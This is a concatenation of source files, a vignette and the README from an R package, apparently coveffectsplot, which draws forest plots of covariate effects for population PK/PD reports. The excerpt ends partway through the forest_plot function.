ggplot2::theme_bw(base_size = 16)+
ggplot2::theme(axis.text.y = ggplot2::element_blank(),
axis.ticks.y = ggplot2::element_blank())+
ggplot2::scale_x_continuous(breaks=c(0.25,0.5,0.8,1,1.25,1.5,2,3))+
ggplot2::coord_cartesian(xlim=c(0.25,2))+
ggplot2::labs(color="",x="Effects Standardized Relative to the Typical Value",y= "Scaled Density")
```
## Simplifying the Distributions into Ranges of Effects
The above plots might be overloading the reader with information. We will simplify them by removing unnecessary details and by computing the desired statistics in advance.
```{r,}
dfeffects$SEX_Male_WT_90<- NULL
dfeffectslong<- tidyr::gather(dfeffects)
dfeffectslong<- dplyr::group_by(dfeffectslong,key)
dfeffectslongsummaries<- dplyr::summarise(dfeffectslong,mid=quantile(value,0.5),
lower=quantile(value,0.05),
upper=quantile(value,0.95))
dfeffectslongsummaries$paramname <- "CL"
dfeffectslongsummaries$covname <- c("BSV","REF","Weight","Weight","Sex")
dfeffectslongsummaries$label <- c("95% of patients","70 kg/Woman",
"50 kg/Woman", "90 kg/Woman","70 kg/Man")
dfeffectslongsummaries<- rbind(dfeffectslongsummaries,
data.frame(key=c("BSV","BSV"),
mid=c(quantile(dfeffects$BSV,0.5), quantile(dfeffects$BSV,0.5)),
lower = c(quantile(dfeffects$BSV,0.25), quantile(dfeffects$BSV,0.05)),
upper = c(quantile(dfeffects$BSV,0.75), quantile(dfeffects$BSV,0.95)),
paramname= "CL",
covname=c("BSV","BSV"),
label = c("50% of patients","90% of patients")
)
)
dfeffectslongsummaries<- dfeffectslongsummaries[c(2,6,7,3,4,5),]
plotdata <- dplyr::mutate(dfeffectslongsummaries,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
plotdata<- as.data.frame(plotdata)
plotdata<- plotdata[,c("paramname","covname","label","mid","lower","upper","LABEL")]
knitr::kable(plotdata)
```
## Plotting the Effects Data
First we do a customized `ggplot`, but we quickly notice that it has some issues, like the lack of a legend for the clinical reference area, vertical labels etc. We then show how `coveffectsplot::forest_plot` can generate a plot with annotations, a side table with values, and legends. For interactive reordering of categories, editing of labels and more, export the data as a "csv" and launch the shiny app via `coveffectsplot::run_interactiveforestplot()`.
```{r,fig.width=7 }
plotdata$covname <- as.factor(plotdata$covname)
plotdata$covname <- reorder(plotdata$covname , c(3,4,4,2,1,1))
plotdata$label <- reorder(as.factor(plotdata$label) , c(1,3,2,4,5,6))
ggplot2::ggplot(data = plotdata, ggplot2::aes_string(
y = "label",
x = "mid",
xmin = "lower",
xmax = "upper"
)) +
ggstance::geom_pointrangeh(
position = ggstance::position_dodgev(height = 0.75),
ggplot2::aes(color = "90 %CI\nCovariate Effects"),
size = 1,
alpha = 1
)+
ggplot2::annotate("rect", xmin = min(0.8),
xmax = max(1.25), ymin = -Inf, ymax = Inf, fill = "gray",alpha=0.1)+
ggplot2::geom_vline(ggplot2::aes(xintercept = 1,linetype="Reference"))+
ggplot2::facet_grid(covname~.,scales="free_y",switch="y")+
ggplot2::labs(y="",x="Effects Relative to Reference Value",
colour="",linetype="")+
ggplot2::theme_bw()
```
```{r,dpi = 72}
png("./coveffectsplot.png",width =9 ,height = 6,units = "in",res=72)
coveffectsplot::forest_plot(plotdata,
ref_area = c(0.8, 1/0.8),
x_facet_text_size = 13,
y_facet_text_size = 13,
interval_legend_text = "Median (points)\n90% CI (horizontal lines)",
ref_legend_text = "Reference (vertical line)\n+/- 20% ratios (gray area)",
area_legend_text = "Reference (vertical line)\n+/- 20% ratios (gray area)",
xlabel = "Fold Change Relative to Parameter",
facet_formula = "covname~.",
facet_switch = "both",
facet_scales = "free",
facet_space = "fixed",
paramname_shape = TRUE,
show_table_facet_strip = "none",
table_position = "right",
table_text_size=4,
plot_table_ratio = 4,
legend_space_x_mult = 0.5,
return_list = FALSE)
dev.off()
```

Using interactive graphics with hover on-demand functionality would remove the need for a side table; this can be achieved using `plotly`. The code is included but not evaluated to keep the size of the vignette small.
```{r,fig.width=7 ,eval=FALSE}
plotdata<- plotdata[ c(3,2,1,4,5,6),]
plotly::plot_ly(plotdata) %>%
plotly::add_segments(
x = ~ round(lower, 2),
xend = ~ round(upper, 2),
y = ~ label,
yend = ~ label,
name = '90%CI',
line = list(color = plotly::toRGB("blue", alpha = 0.5), width = 5),
hoverinfo = "text",
text = ~ paste("</br> 90%CI: ",
paste(round(lower, 2), round(upper, 2)))
) %>%
plotly::add_markers(
x = ~ round(mid, 2),
y = ~ label,
name = "Median",
marker = list(
color = plotly::toRGB("black", alpha = 0.3),
size = 20,
symbol = "diamond"
),
hoverinfo = "text",
text = ~ paste("</br> Median: ",
paste(round(mid, 2)))
) %>%
plotly::layout(
xaxis = list(
title = 'Effects Relative to Reference',
ticks = "outside",
autotick = TRUE,
ticklen = 5,
gridcolor = plotly::toRGB("gray50"),
showline = TRUE
) ,
yaxis = list (
title = '' ,
autorange = TRUE,
type = "category",
categoryorder = "trace",
ticks = "outside",
autotick = TRUE,
ticklen = 5,
gridcolor = plotly::toRGB("gray50"),
showline = TRUE
),
shapes =list(
type = "rect",
x0 = 0.8,
x1 = 1.25,
xref = "x",
yref = "paper",
y0 = 0,
y1 = 1,
line = list(width = 0),
fillcolor = plotly::toRGB("black", alpha = 0.2)
)
)
```
The `return_list` option lets you return a list of ggplot objects that can be further manipulated.
```{r,dpi = 72}
png("./coveffectsplot2.png",width =9 ,height = 6,units = "in",res=72)
plotlist<- coveffectsplot::forest_plot(plotdata,
ref_area = c(0.8, 1/0.8),
x_facet_text_size = 13,
y_facet_text_size = 13,
interval_legend_text = "Median (points)\n90% CI (horizontal lines)",
ref_legend_text = "Reference\n(vertical line)\n+/- 20% ratios\n(gray area)",
area_legend_text = "Reference\n(vertical line)\n+/- 20% ratios\n(gray area)",
xlabel = "Fold Change Relative to Parameter",
facet_formula = "covname~.",
facet_switch = "both",
facet_scales = "free",
facet_space = "fixed",
paramname_shape = FALSE,
table_position = "right",
table_text_size = 4,
plot_table_ratio = 4,
show_table_facet_strip = "none",
legend_space_x_mult = 0.5,
ref_area_col = rgb( col2rgb("gray50")[1], col2rgb("gray50")[2],col2rgb("gray50")[3],
max = 255, alpha = 0.1*255 ) ,
interval_col = "steelblue",
return_list = TRUE)
egg::ggarrange(
plotlist[[1]]+
ggplot2::labs(x= expression(paste("Changes Relative to ",
CL["subscript"]^alpha["beta"], " Reference"),
sep=""))+
ggplot2::theme(strip.text.y = ggplot2::element_text(colour="blue")),
plotlist[[2]] ,
nrow = 1,
widths = c(4, 1)
)
dev.off()
```

In this introductory vignette we covered univariate covariate effects where we vary one at a time. Refer to the other vignettes for more advanced examples illustrating full simulation of PK or PK/PD or exposure-response models including the use of full covariate distributions.<file_sep>/R/run_interactiveforestplot.R
#' Run the interactiveforestplot application
#'
#' Run the \code{interactiveforestplot} application.
#' @param data optional data to load when the app is launched
#' @examples
#' if (interactive()) {
#' run_interactiveforestplot()
#' }
#' @export
run_interactiveforestplot <- function(data = NULL) {
  if (!is.null(data) && !is.data.frame(data)) {
    stop("data must be a data.frame", call. = FALSE)
  }
  appDir <- system.file("shiny", package = "coveffectsplot")
  if (appDir == "") {
    stop("Could not find shiny app directory. Try re-installing `coveffectsplot`.",
         call. = FALSE)
  }
  if (!is.null(data)) {
    .GlobalEnv$coveffectsplot_initdata <- data
    on.exit(rm(coveffectsplot_initdata, envir = .GlobalEnv))
  }
  shiny::runApp(appDir, display.mode = "normal")
}
# Make CRAN happy
if (getRversion() >= "2.15.1") utils::globalVariables(c("coveffectsplot_initdata"))<file_sep>/R/get_sample_data.R
#' Get sample dataset
#'
#' Get a sample dataset that is included with the package to plot a forest plot.
#'
#' @param dataset A sample dataset file.
#'
#' @export
get_sample_data <- function(dataset = "dfall.csv") {
  data_dir <- system.file("sample_data", package = "coveffectsplot")
  if (data_dir == "") {
    stop("Could not find data directory. Try re-installing `coveffectsplot`.",
         call. = FALSE)
  }
  data_files <- list.files(data_dir)
  if (!dataset %in% data_files) {
    stop("Data file does not exist. Possible files: ",
         paste(data_files, collapse = ", "),
         call. = FALSE)
  }
  utils::read.csv(file.path(data_dir, dataset))
}
<file_sep>/README.md
coveffectsplot
========

[](https://travis-ci.org/smouksassi/coveffectsplot)

A package that provides the function `forest_plot` and an accompanying Shiny app to facilitate the production of forest plots to visualize covariate effects, as commonly used in pharmacometrics population PK/PD reports.
### Installation and Running information
```
# Install from CRAN:
install.packages("coveffectsplot")
# Or the development version from GitHub:
#install.packages("devtools")
devtools::install_github('smouksassi/coveffectsplot')
```
Launch the app using this command, then press the blue "use sample data" text to load the app with demo data:
```
coveffectsplot::run_interactiveforestplot()
```
This will generate this plot:

### Expected data
Several example datasets are provided to illustrate the various functionality, but the goal is that you simulate, compute and bring your own data. The app will help you, using point-and-click interactions, to design a plot that communicates your model covariate effects.
The data that is loaded to the app should have at a minimum the following columns with the exact names:
* paramname: Parameter on which the effects are shown e.g. CL, Cmax, AUC etc.
* covname: Covariate name that the effects belong to e.g. Weight, SEX, Dose etc.
* label: Covariate value for which the effects are shown e.g. 50 kg, 50 kg/90 kg (here the reference value is contained in the label).
* mid: Middle value for the effects usually the median from the uncertainty distribution.
* lower: Lower value for the effects usually the 2.5% or 5% from the uncertainty distribution.
* upper: Upper value for the effects usually the 97.5% or 95% from the uncertainty distribution.
You might also choose to have a covname with value All (or other appropriate value) to illustrate and show the uncertainty on the reference value in a separate facet.
Additionally, you might want to have a covname with value BSV to illustrate and show the between subject variability (BSV) spread.
The example data show where 90% and 50% of the patients will be, based on the model BSV estimate, for the selected paramname(s).

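
As a minimal sketch, a hand-built data set with the required columns (values invented for illustration) plus the `LABEL` column that `forest_plot` uses for the side table can be plotted directly:

```
library(coveffectsplot)
plotdata <- data.frame(
  paramname = "CL",
  covname   = "Weight",
  label     = c("50 kg", "90 kg"),
  mid       = c(0.78, 1.21),
  lower     = c(0.70, 1.09),
  upper     = c(0.87, 1.35)
)
plotdata$LABEL <- paste0(plotdata$mid, " [", plotdata$lower, "-", plotdata$upper, "]")
forest_plot(plotdata, facet_formula = "covname~.", table_position = "right")
```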
The vignette [Introduction to coveffectsplot](https://cran.r-project.org/package=coveffectsplot/vignettes/introduction_to_coveffectsplot.html) will walk you through the background and how to compute and build the required data that the shiny app or the function `forest_plot` expects. There are some data management steps that the app does automatically. Calling the function directly will require you to build the table LABEL column and to control the ordering of the variables. The `forest_plot` help has several examples.
The package also include vignettes with several step-by-step detailed examples:
<a href="https://cran.r-project.org/package=coveffectsplot/vignettes/PK_Example.html">PK example</a>
<a href="https://cran.r-project.org/package=coveffectsplot/vignettes/Pediatric_Cov_Sim.html">Pediatric example</a>
<a href="https://cran.r-project.org/package=coveffectsplot/vignettes/PKPD_Example.html">PK PD example</a>
<a href="https://cran.r-project.org/package=coveffectsplot/vignettes/Exposure_Response_Example.html">Exposure Response</a>
### Example using a real drug label data
The prezista drug label data was extracted from the FDA label; calling the `forest_plot` function gives:
```
library(coveffectsplot)
plotdata <- dplyr::mutate(prezista,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
plotdata<- as.data.frame(plotdata)
plotdata<- plotdata[,c("paramname","covname","label","mid","lower","upper","LABEL")]
plotdata$covname <- factor(plotdata$covname)
levels(plotdata$covname) <- c("Other\nAntiretrovirals","Protease\nInhibitors")
#png("prezista.png",width =12 ,height = 8,units = "in",res=72,type="cairo-png")
coveffectsplot::forest_plot(plotdata,
ref_area = c(0.5, 1.5),
base_size = 16 ,
x_facet_text_size = 13,
y_facet_text_size = 16,
y_facet_text_angle = 270,
interval_legend_text = "Median (points)\n90% CI (horizontal lines)",
ref_legend_text = "Reference (vertical line)\n+/- 50% (gray area)",
area_legend_text = "Reference (vertical line)\n+/- 50% (gray area)",
xlabel = "Median 90%CI Fold Change Relative to Parameter",
facet_formula = "covname~.",
facet_switch = "both",
facet_scales = "free",
facet_space = "free",
strip_placement = "outside",
paramname_shape = TRUE,
table_position = "right",
table_text_size = 4,
plot_table_ratio = 4,
vertical_dodge_height = 0.8,
legend_space_x_mult = 0.1,
legend_order = c("shape","pointinterval","ref", "area"),
legend_shape_reverse = TRUE,
show_table_facet_strip = "none",
return_list = FALSE)
#dev.off()
```

<file_sep>/R/forest_plot.R
# Same as the base R `which()` function, but returns 0 instead of an empty vector
# if there are no TRUE values in the array
which0 <- function(x) {
  result <- which(x)
  if (length(result) == 0) {
    result <- 0
  }
  result
}
#' Forest plot
#'
#' Produce forest plots to visualize covariate effects
#'
#' @param data Data to use.
#' @param facet_formula Facet formula.
#' @param xlabel X axis title.
#' @param ylabel Y axis title.
#' @param x_facet_text_size Facet text size X.
#' @param y_facet_text_size Facet text size Y.
#' @param x_facet_text_angle Facet text angle X.
#' @param y_facet_text_angle Facet text angle Y.
#' @param x_facet_text_vjust Facet text vertical justification.
#' @param y_facet_text_vjust Facet text vertical justification.
#' @param x_facet_text_hjust Facet text horizontal justification.
#' @param y_facet_text_hjust Facet text horizontal justification.
#' @param xy_facet_text_bold Bold Facet text. Logical TRUE FALSE.
#' @param x_label_text_size X axis labels size.
#' @param y_label_text_size Y axis labels size.
#' @param table_text_size Table text size.
#' @param base_size theme_bw base_size for the plot and table.
#' @param theme_benrich apply Benjamin Rich's theming.
#' @param table_title with theme_benrich on what text to use for table title.
#' @param table_title_size table title size.
#' @param ref_legend_text Reference legend text.
#' @param area_legend_text Area legend text.
#' @param interval_legend_text Pointinterval Legend text.
#' @param legend_order Legend order. A four-element vector with the following
#' items ordered in your desired order: "pointinterval", "ref", "area", "shape".
#' if an item is absent the legend will be omitted.
#' @param combine_area_ref_legend Combine reference and area legends if they
#' share the same text?
#' @param legend_position where to put the legend: "top", "bottom","right","none"
#' @param show_ref_area Show reference window?
#' @param ref_area Reference area. Two-element numeric vector multiplying the ref_value.
#' @param show_ref_value Show reference line?
#' @param ref_value X intercept of reference line.
#' @param ref_area_col Reference area background color.
#' @param ref_value_col Reference line color.
#' @param interval_col Point range color. One value.
#' @param bsv_col BSV pointinterval color. One value.
#' @param interval_bsv_text BSV legend text.
#' @param strip_col Strip background color.
#' @param paramname_shape Map symbol to parameter(s)?
#' @param legend_shape_reverse TRUE or FALSE.
#' @param facet_switch Facet switch to near axis. Possible values: "both", "y",
#' "x", "none".
#' @param facet_scales Facet scales. Possible values: "free_y", "fixed",
#' "free_x", "free".
#' @param facet_space Facet spaces. Possible values: "fixed", "free_x",
#' "free_y", "free".
#' @param facet_labeller Facet Labeller. Default "label_value"
#' any other valid `facet_grid` labeller can be specified.
#' @param strip_placement Strip placement. Possible values: "inside", "outside".
#' @param strip_outline Draw rectangle around the Strip. Logical TRUE FALSE.
#' @param facet_spacing Control the space between facets in points.
#' @param major_x_ticks X axis major ticks. Numeric vector.
#' @param minor_x_ticks X axis minor ticks. Numeric vector.
#' @param x_range Range of X values. Two-element numeric vector.
#' @param logxscale X axis log scale. Logical TRUE FALSE.
#' @param show_yaxis_gridlines Draw the y axis gridlines. Logical TRUE FALSE.
#' @param show_xaxis_gridlines Draw the x axis gridlines. Logical TRUE FALSE.
#' @param show_table_facet_strip Possible values: "none", "both", "y", "x".
#' @param table_facet_switch Table facet switch to near axis. Possible values: "both", "y",
#' "x", "none".
#' @param show_table_yaxis_tick_label Show table y axis ticks and labels?
#' @param reserve_table_xaxis_label_space keep space for the x axis label to keep alignment.
#' @param table_panel_border Draw the panel border for the table. Logical TRUE FALSE.
#' @param table_position Table position. Possible values: "right", "below", "none".
#' @param plot_table_ratio Plot-to-table ratio. Suggested value between 1-5.
#' @param vertical_dodge_height Amount of vertical dodging to apply on segments and table text.
#' @param legend_space_x_mult Multiplier to adjust the spacing between legend items.
#' @param legend_ncol_interval Control the number of columns for the pointinterval legend.
#' @param legend_ncol_shape Control the number of columns for the shape legend.
#' @param plot_margin Control the white space around the main plot. Vector of four numeric values
#' for the top, right, bottom and left sides.
#' @param table_margin Control the white space around the table. Vector of four numeric values
#' for the top, right, bottom and left sides.
#' @param legend_margin Control the white space around the plot legend. Vector of four numeric values
#' for the top, right, bottom and left sides.
#' @param parse_xlabel treat xlabel as an expression. Logical FALSE TRUE.
#' @param parse_ylabel treat ylabel as an expression. Logical FALSE TRUE.
#' @param return_list If TRUE, a list of the main plot and the table plot is returned
#' instead of the combined gtable/plot.
#' @rawNamespace import(data.table, except = c(last,between,first))
#' @examples
#' library(dplyr)
#'
#' # Example 1
#'
#' plotdata <- get_sample_data("forest-plot-table.csv")
#' plotdata <- plotdata %>%
#' mutate(midlabel = format(round(mid,2), nsmall = 2),
#' lowerlabel = format(round(lower,2), nsmall = 2),
#' upperlabel = format(round(upper,2), nsmall = 2),
#' LABEL = paste0(midlabel, " [", lowerlabel, "-", upperlabel, "]"))
#' param <- "BZD AUC"
#' plotdata <- filter(plotdata,paramname==param)
#' plotdata$covname <- reorder(plotdata$covname,plotdata$upper,FUN =max)
#' plotdata$label <- reorder(plotdata$label,plotdata$scen)
#' covs <- c("WEIGHT","AGE")
#' plotdata <- filter(plotdata,covname%in%covs)
#' forest_plot(plotdata,
#' ref_legend_text = "Reference (vertical line)",
#' area_legend_text = "Reference (vertical line)",
#' xlabel = paste("Fold Change in", param, "Relative to Reference"),
#' logxscale = TRUE, major_x_ticks =c(0.1,1,1.5),
#' show_ref_area = FALSE,
#' facet_formula = "covname~.",
#' facet_scales = "free_y",
#' facet_space = "free_y",
#' show_table_facet_strip = "none",
#' table_position = "right",
#' plot_table_ratio = 4)
#'
#' # Example 2
#'
#' plotdata <- get_sample_data("forest-plot-table.csv")
#' plotdata <- plotdata %>%
#' mutate(midlabel = format(round(mid,2), nsmall = 2),
#' lowerlabel = format(round(lower,2), nsmall = 2),
#' upperlabel = format(round(upper,2), nsmall = 2),
#' LABEL = paste0(midlabel, " [", lowerlabel, "-", upperlabel, "]"))
#' param <- c("BZD AUC","BZD Cmax")
#' plotdata <- filter(plotdata,paramname%in%param)
#' plotdata <- filter(plotdata,covname%in%"WEIGHT")
#' plotdata$covname <- reorder(plotdata$covname,plotdata$upper,FUN =max)
#' plotdata$label <- reorder(plotdata$label,plotdata$scen)
#' forest_plot(plotdata,
#' ref_legend_text = "Reference (vertical line)",
#' area_legend_text = "Reference (vertical line)",
#' xlabel = paste("Fold Change of Parameter", "Relative to Reference"),
#' show_ref_area = FALSE,
#' facet_formula = "covname~paramname",
#' facet_scales = "free_y",
#' facet_space = "free_y",
#' x_facet_text_size = 10,
#' y_facet_text_size = 10,
#' y_label_text_size = 10,
#' x_label_text_size = 10,
#' facet_switch = "both",
#' show_table_facet_strip = "both",
#' show_table_yaxis_tick_label = TRUE,
#' table_position = "below",
#' plot_table_ratio = 1)
#'\dontrun{
#' # Example 3
#'
#' plotdata <- get_sample_data("forestplotdatacpidata.csv")
#' forest_plot(plotdata,
#' ref_area = c(0.8, 1.2),
#' x_facet_text_size = 12,
#' y_facet_text_size = 12,
#' y_label_text_size = 10,
#' x_label_text_size = 10,
#' table_text_size = 6,
#' plot_table_ratio = 1.5,
#' ref_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' area_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' xlabel = "Fold Change Relative to RHZE",
#' facet_formula = "covname~paramname",
#' table_position = "below",
#' show_table_facet_strip = "both",
#' show_table_yaxis_tick_label = TRUE)
#'
#' # Example 4
#' plotdata <- get_sample_data("dataforest.csv")
#' plotdata <- plotdata %>%
#' mutate(midlabel = format(round(mid,2), nsmall = 2),
#' lowerlabel = format(round(lower,2), nsmall = 2),
#' upperlabel = format(round(upper,2), nsmall = 2),
#' LABEL = paste0(midlabel, " [", lowerlabel, "-", upperlabel, "]"))
#' plotdata <- plotdata %>%
#' filter(covname%in%c("Weight"))
#' plotdata$label <- as.factor(as.character(plotdata$label))
#' plotdata$label <- factor(plotdata$label, c("36.2 kg","66 kg","110 kg"))
#' forest_plot(plotdata,
#' ref_area = c(0.8, 1.2),
#' x_facet_text_size = 13,
#' y_facet_text_size = 13,
#' ref_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' area_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' xlabel = "Fold Change Relative to Parameter",
#' facet_formula = "covname~paramname",
#' facet_switch = "both",
#' facet_scales = "free",
#' facet_space = "fixed",
#' table_position = "below",
#' plot_table_ratio = 1,
#' show_table_facet_strip = "both",
#' show_table_yaxis_tick_label = TRUE)
#'
#' # Example 5
#'
#' forest_plot(plotdata,
#' ref_area = c(0.8, 1.2),
#' x_facet_text_size = 13,
#' y_facet_text_size = 13,
#' ref_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' area_legend_text = "Reference (vertical line)\n+/- 20% limits (colored area)",
#' xlabel = "Fold Change Relative to Parameter",
#' facet_formula = "covname~.",
#' facet_switch = "both",
#' facet_scales = "free",
#' facet_space = "fixed",
#' paramname_shape = TRUE,
#' table_position = "none",
#' ref_area_col = rgb( col2rgb("gray50")[1], col2rgb("gray50")[2],col2rgb("gray50")[3],
#' max = 255, alpha = 0.1*255 ) ,
#' interval_col = "steelblue",
#' strip_col = "lightblue",
#' plot_table_ratio = 1)
#'}
#' @export
forest_plot <- function(
data,
facet_formula = "covname~paramname",
xlabel = "",
ylabel = "",
x_facet_text_size = 13,
y_facet_text_size = 13,
x_facet_text_angle = 0,
y_facet_text_angle = 180,
x_facet_text_vjust = 0.5,
y_facet_text_vjust = 0.5,
x_facet_text_hjust = 0.5,
y_facet_text_hjust = 0.5,
xy_facet_text_bold = TRUE,
x_label_text_size = 16,
y_label_text_size = 16,
table_text_size = 7,
base_size = 22,
theme_benrich = FALSE,
table_title = "",
table_title_size = 15,
ref_legend_text = "",
area_legend_text = "",
interval_legend_text = "",
legend_order = c("pointinterval", "ref", "area", "shape"),
combine_area_ref_legend = TRUE,
legend_position = "top",
show_ref_area = TRUE,
ref_area = c(0.8, 1.25),
show_ref_value = TRUE,
ref_value = 1,
ref_area_col = "#BEBEBE50",
ref_value_col = "black",
interval_col = "blue",
bsv_col = "red",
interval_bsv_text = "",
strip_col = "#E5E5E5",
paramname_shape = FALSE,
legend_shape_reverse = FALSE,
facet_switch = c("both", "y", "x", "none"),
facet_scales = c("fixed", "free_y", "free_x", "free"),
facet_space = c("fixed", "free_x", "free_y", "free"),
facet_labeller = "label_value",
strip_placement = c("inside", "outside"),
strip_outline = TRUE,
facet_spacing = 5.5,
major_x_ticks = NULL,
minor_x_ticks = NULL,
x_range = NULL,
logxscale = FALSE,
show_yaxis_gridlines = TRUE,
show_xaxis_gridlines = TRUE,
show_table_facet_strip = "none",
table_facet_switch = c("both", "y", "x", "none"),
show_table_yaxis_tick_label = FALSE,
reserve_table_xaxis_label_space = TRUE,
table_panel_border = TRUE,
table_position = c("right", "below", "none"),
plot_table_ratio = 4,
vertical_dodge_height = 0.8,
legend_space_x_mult = 1,
legend_ncol_interval = 1,
legend_ncol_shape = 1,
plot_margin = c(5.5, 5.5, 5.5, 5.5),
table_margin = c(5.5, 5.5, 5.5, 5.5),
legend_margin = c(0, 0.1, -0.1, 0),
parse_xlabel = FALSE,
parse_ylabel = FALSE,
return_list = FALSE)
{
ymax = ymin = x = fill = NULL
plot_margin[ which(is.na(plot_margin) ) ] <- 0
table_margin[ which(is.na(table_margin) ) ] <- 0
legend_margin[ which(is.na(legend_margin) ) ] <- 0
facet_spacing[ which(is.na(facet_spacing) ) ] <- 0
table_position <- match.arg(table_position)
legend_order <- match.arg(legend_order, several.ok = TRUE)
facet_switch <- match.arg(facet_switch)
table_facet_switch <- match.arg(table_facet_switch)
facet_scales <- match.arg(facet_scales)
facet_space <- match.arg(facet_space)
strip_placement <- match.arg(strip_placement)
facet_formula <- stats::as.formula(facet_formula)
y_facet_text_angle<- ifelse(facet_switch %in% c("x","none"),
y_facet_text_angle-180,
y_facet_text_angle)
if (x_facet_text_size <= 0) {
x.strip.text <- ggplot2::element_blank()
table.x.strip.text <- x.strip.text
} else {
x.strip.text <- ggplot2::element_text(size = x_facet_text_size,
angle= x_facet_text_angle,
face = ifelse(xy_facet_text_bold,"bold","plain"),
hjust = x_facet_text_hjust,
vjust = x_facet_text_vjust
)
table.x.strip.text <- x.strip.text
}
if (y_facet_text_size <= 0) {
y.strip.text <- ggplot2::element_blank()
table.y.strip.text <- y.strip.text
} else {
y.strip.text <- ggplot2::element_text(size = y_facet_text_size,
angle= y_facet_text_angle,
face = ifelse(xy_facet_text_bold,"bold","plain"),
hjust = y_facet_text_hjust,
vjust = y_facet_text_vjust
)
table.y.strip.text <- y.strip.text
}
if (theme_benrich && y_facet_text_size >0){
y.strip.text <- ggplot2::element_text(
hjust=1,
vjust=1,
face="bold",
size=y_facet_text_size,
angle= y_facet_text_angle
)
table.y.strip.text <- ggplot2::element_text(
hjust=1,
vjust=1,
face="bold",
size=y_facet_text_size,
angle= y_facet_text_angle
)
}
if ( !is.expression(xlabel) && xlabel == "" ) {
xlabel <- paste("Changes of Parameter Relative to Reference")
}
if ( !is.expression(xlabel) && parse_xlabel) {
xlabel <- parse(text=xlabel)
}
if ( !is.expression(ylabel) && parse_ylabel) {
ylabel <- parse(text=ylabel)
}
if (table_title == "") {
table_title <- "Median [95% CI]"
}
if (ref_legend_text == "") {
ref_legend_text <- "Reference (vertical line)\nClinically relevant limits (colored area)"
}
if (area_legend_text == "") {
area_legend_text <- "Reference (vertical line)\nClinically relevant limits (colored area)"
}
if (interval_legend_text == "") {
interval_legend_text <- "Median (points)\n95% CI (horizontal lines)"
}
if (interval_bsv_text == "") {
interval_bsv_text <- "BSV (points)\nPrediction Intervals (horizontal lines)"
}
interval_pos <- which0(legend_order == "pointinterval")[1]
fill_pos <- which0(legend_order == "area")[1]
linetype_pos <- which0(legend_order == "ref")[1]
shape_pos <- which0(legend_order == "shape")[1]
if (combine_area_ref_legend) {
fill_pos <- linetype_pos
}
guide_interval <- ggplot2::guide_legend("", order = interval_pos,
ncol = legend_ncol_interval)
guide_fill <- ggplot2::guide_legend("", order = fill_pos)
guide_linetype <- ggplot2::guide_legend("", order = linetype_pos)
guide_shape <- ggplot2::guide_legend("", order = shape_pos,
override.aes = list(linetype = 0,
colour = "gray"),
reverse = legend_shape_reverse,
ncol = legend_ncol_shape)
if (interval_pos == 0) guide_interval <- FALSE
if (fill_pos == 0) guide_fill <- FALSE
if (linetype_pos == 0) guide_linetype <- FALSE
if (shape_pos == 0) guide_shape <- FALSE
data$label <- factor(data$label)
data$pointintervalcolor <- ifelse( !data$covname%in%
c("BSV","bsv","IIV","Bsv"),
interval_legend_text,
interval_bsv_text)
data$pointintervalcolor <- factor(data$pointintervalcolor,
levels =c(interval_legend_text,
interval_bsv_text)[!duplicated(c(interval_legend_text,
interval_bsv_text))]
)
colbreakvalues<- c(interval_legend_text, interval_bsv_text)
main_plot <-
ggplot2::ggplot(data = data, ggplot2::aes_string(
y = "label",
x = "mid",
xmin = "lower",
xmax = "upper"
)) +
ggstance::geom_pointrangeh(
position = ggstance::position_dodgev(height = vertical_dodge_height),
ggplot2::aes_string(color = "pointintervalcolor"),
size = 1,
alpha = 0
)# dummy to prevent a scales bug that I reported to ggplot2 maintainers
if (show_ref_area) {
main_plot <- main_plot +
ggplot2::annotate(
"rect",
xmin = ref_value*min(ref_area),
xmax = ref_value*max(ref_area),
ymin = -Inf,
ymax = Inf,
fill = ref_area_col
) +
ggplot2::geom_ribbon(
data = data.frame(x = ref_value, ymax = ref_value, ymin = ref_value,
fill = area_legend_text),
ggplot2::aes(
x = x,
ymax = ymax,
ymin = ymin,
fill = fill
),
size = 1,
inherit.aes = FALSE
)
}
# fake ribbon for fill legend
if (show_ref_value) {
main_plot <- main_plot +
ggplot2::geom_vline(
ggplot2::aes(xintercept = ref_value, linetype = ref_legend_text),
size = 1, color = ref_value_col
)
}
main_plot <- main_plot+
ggstance::geom_pointrangeh(
position = ggstance::position_dodgev(height = vertical_dodge_height),
ggplot2::aes_string(color = "pointintervalcolor"),
size = 1,
alpha = 0.8
)+
ggplot2::scale_colour_manual("", breaks = colbreakvalues,
values = c(interval_col,bsv_col)) +
ggplot2::scale_linetype_manual("", breaks = ref_legend_text, values = 2) +
ggplot2::scale_fill_manual("", breaks = area_legend_text, values = ref_area_col)+
ggplot2::guides(colour = guide_interval,
linetype = guide_linetype,
fill = guide_fill,
shape = guide_shape )
if (!show_ref_area) {
main_plot <- main_plot +
ggplot2::guides(colour = guide_interval,
linetype = guide_linetype,
shape = guide_shape,
fill = NULL)
}
main_plot <- main_plot +
ggplot2::aes_string(group = "paramname")
if (paramname_shape) {
main_plot <- main_plot +
ggplot2::aes_string(shape = "paramname")
}
if (facet_switch != "none") {
main_plot <- main_plot +
ggplot2::facet_grid(facet_formula,
scales = facet_scales,
space = facet_space,
switch = facet_switch,
labeller = facet_labeller)
} else {
main_plot <- main_plot +
ggplot2::facet_grid(facet_formula,
scales = facet_scales,
space = facet_space,
switch = NULL,
labeller = facet_labeller)
}
main_plot <- main_plot +
ggplot2::theme_bw(base_size = base_size) +
ggplot2::theme(
axis.text.y = ggplot2::element_text(
angle = 0,
size = y_label_text_size
),
axis.text.x = ggplot2::element_text(size = x_label_text_size),
legend.position = legend_position,
legend.justification = c(0.5, 0.5),
legend.direction = "horizontal",
legend.key.width = ggplot2::unit(3, "line"),
strip.text.x = x.strip.text,
strip.text.y = y.strip.text,
strip.text.y.left = y.strip.text,
panel.grid.minor = ggplot2::element_line(colour = "gray", linetype = "dotted"),
panel.grid.major = ggplot2::element_line(colour = "gray", linetype = "solid"),
strip.background = ggplot2::element_rect(fill = strip_col),
panel.spacing = ggplot2::unit(facet_spacing, "pt"),
